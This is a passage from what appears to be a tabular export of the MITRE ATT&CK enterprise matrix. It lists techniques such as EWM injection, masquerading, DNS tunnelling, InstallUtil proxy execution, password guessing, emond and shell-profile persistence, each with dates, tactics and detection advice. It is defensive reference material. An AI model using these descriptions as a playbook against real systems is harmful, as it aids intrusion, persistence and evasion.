Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.
Execution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as <code>WriteProcessMemory</code> and <code>CreateRemoteThread</code>.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. | 14 January 2020 | enterprise-attack | Defense Evasion, Privilege Escalation | Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017) |
T1036.005 | Masquerading: Match Legitimate Name or Location | Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
Adversaries may also use the same icon of the file they are trying to mimic. | 10 February 2020 | enterprise-attack | Defense Evasion | Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)
In containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names.(Citation: Docker Images) Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users. |
T1020 | Automated Exfiltration | Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020)
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). | 31 May 2017 | enterprise-attack | Exfiltration | Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. |
T1559.001 | Inter-Process Communication: Component Object Model | Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018) | 12 February 2020 | enterprise-attack | Execution | Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. |
T1071.004 | Application Layer Protocol: DNS | Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) | 15 March 2020 | enterprise-attack | Command and Control | Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)
Monitor for DNS traffic to/from known-bad or suspicious domains. |
T1665 | Hide Infrastructure | Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished in various ways including by identifying and filtering traffic from defensive tools,(Citation: TA571) masking malicious domains to obfuscate the true destination from both automated scanning tools and security researchers,(Citation: Schema-abuse)(Citation: Facad1ng)(Citation: Browser-updates) and otherwise hiding malicious artifacts to delay discovery and prolong the effectiveness of adversary infrastructure that could otherwise be identified, blocked, or taken down entirely.
C2 networks may include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections. For example, an adversary may use a virtual private cloud to spoof their IP address to closer align with a victim's IP address ranges. This may also bypass security measures relying on geolocation of the source IP address.(Citation: sysdig)(Citation: Orange Residential Proxies)
Adversaries may also attempt to filter network traffic in order to evade defensive tools in numerous ways, including blocking/redirecting common incident responder or security appliance user agents.(Citation: mod_rewrite)(Citation: SocGholish-update) Filtering traffic based on IP and geo-fencing may also avoid automated sandboxing or researcher activity (i.e., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)).(Citation: TA571)(Citation: mod_rewrite)
Hiding C2 infrastructure may also be supported by [Resource Development](https://attack.mitre.org/tactics/TA0042) activities such as [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) and [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584). For example, using widely trusted hosting services or domains such as prominent URL shortening providers or marketing services for C2 networks may enable adversaries to present benign content that later redirects victims to malicious web pages or infrastructure once specific conditions are met.(Citation: StarBlizzard)(Citation: QR-cofense) | 13 February 2024 | enterprise-attack | Command and Control | null |
T1218.004 | System Binary Proxy Execution: InstallUtil | Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute <code>[System.ComponentModel.RunInstaller(true)]</code>. (Citation: LOLBAS Installutil) | 23 January 2020 | enterprise-attack | Defense Evasion | Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed. |
T1069.003 | Permission Groups Discovery: Cloud Groups | Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
With authenticated access there are several tools that can be used to find permissions groups. The <code>Get-MsolRole</code> PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).
Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command <code>az ad user get-member-groups</code> will list groups associated to a user account for Azure while the API endpoint <code>GET https://cloudidentity.googleapis.com/v1/groups</code> lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) In AWS, the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate the policies attached to a role.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS <code>GetBucketAcl</code> API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object. | 21 February 2020 | enterprise-attack | Discovery | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity. |
T1595.002 | Active Scanning: Vulnerability Scanning | Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). | 02 October 2020 | enterprise-attack | Reconnaissance | Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. |
T1027.004 | Obfuscated Files or Information: Compile After Delivery | Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac) | 16 March 2020 | enterprise-attack | Defense Evasion | Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. The compilation of payloads may also generate file creation and/or file write events. Look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these should only be used in specific and limited cases, like for software development. |
T1074.002 | Data Staged: Remote Data Staging | Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection. | 13 March 2020 | enterprise-attack | Collection | Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). |
T1110.001 | Brute Force: Password Guessing | Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)
Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:
* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP & 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* HTTP/HTTP Management Services (80/TCP & 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)
* SNMP (161/UDP and 162/TCP/UDP)
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018). Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020)
In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625. | 11 February 2020 | enterprise-attack | Credential Access | Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials. |
T1495 | Firmware Corruption | Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.
In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) Depending on the device, this attack may also result in [Data Destruction](https://attack.mitre.org/techniques/T1485). | 12 April 2019 | enterprise-attack | Impact | System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior. |
T1546.014 | Event Triggered Execution: Emond | Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place.
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service. | 24 January 2020 | enterprise-attack | Persistence, Privilege Escalation | Monitor emond rules creation by checking for files created or modified in <code>/etc/emond.d/rules/</code> and <code>/private/var/db/emondClients</code>. |
T1021.004 | Remote Services: SSH | Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user. | 11 February 2020 | enterprise-attack | Lateral Movement | Use of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
On macOS systems <code>log show --predicate 'process = "sshd"'</code> can be used to review incoming SSH connection attempts for suspicious activity. The command <code>log show --info --predicate 'process = "ssh" or eventMessage contains "ssh"'</code> can be used to review outgoing SSH connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
On Linux systems SSH activity can be found in the logs located in <code>/var/log/auth.log</code> or <code>/var/log/secure</code> depending on the distro you are using. |
T1547 | Boot or Logon Autostart Execution | Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. | 23 January 2020 | enterprise-attack | Persistence, Privilege Escalation | Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns) Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed.
Suspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.
Monitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation. |
T1027.003 | Obfuscated Files or Information: Steganography | Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.
[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu)
By the end of 2017, a threat group used <code>Invoke-PSImage</code> to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics) | 05 February 2020 | enterprise-attack | Defense Evasion | Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography. |
T1037.003 | Boot or Logon Initialization Scripts: Network Logon Script | Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.
Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. | 10 January 2020 | enterprise-attack | Persistence, Privilege Escalation | Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon. |
T1132.002 | Data Encoding: Non-Standard Encoding | Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) | 14 March 2020 | enterprise-attack | Command and Control | Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) |
T1592.004 | Gather Victim Host Information: Client Configurations | Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). | 02 October 2020 | enterprise-attack | Reconnaissance | Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. |
T1583.001 | Acquire Infrastructure: Domains | Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) | 30 September 2020 | enterprise-attack | Resource Development | Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.(Citation: ThreatConnect Infrastructure Dec 2020)
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control. |
T1090.004 | Proxy: Domain Fronting | Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).
For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y. | 14 March 2020 | enterprise-attack | Command and Control | If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) |
T1546.004 | Event Triggered Execution: Unix Shell Configuration Modification | Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (<code>/etc</code>) and the user’s home directory (<code>~/</code>) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the <code>/etc/profile</code> and <code>/etc/profile.d</code> files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into <code>~/.bash_profile</code>, <code>~/.bash_login</code>, or <code>~/.profile</code> which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used <code>~/.bash_profile</code> to ensure execution. Adversaries have also leveraged the <code>~/.bashrc</code> file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the <code>~/.bash_logout</code> file to execute malicious commands at the end of a session.
For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using <code>/etc/profile</code>, <code>/etc/zshenv</code>, <code>/etc/zprofile</code>, and <code>/etc/zlogin</code>.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with <code>~/.zprofile</code> and <code>~/.zlogin</code>. The interactive shell uses the <code>~/.zshrc</code> to configure the user environment. Upon exiting, <code>/etc/zlogout</code> and <code>~/.zlogout</code> are executed. For legacy programs, macOS executes <code>/etc/bashrc</code> on startup. | 24 January 2020 | enterprise-attack | Persistence, Privilege Escalation | While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.
Monitor for changes to <code>/etc/profile</code> and <code>/etc/profile.d</code>, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.(Citation: ESF_filemonitor)
For most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the <code>/etc/shells</code> file.
|
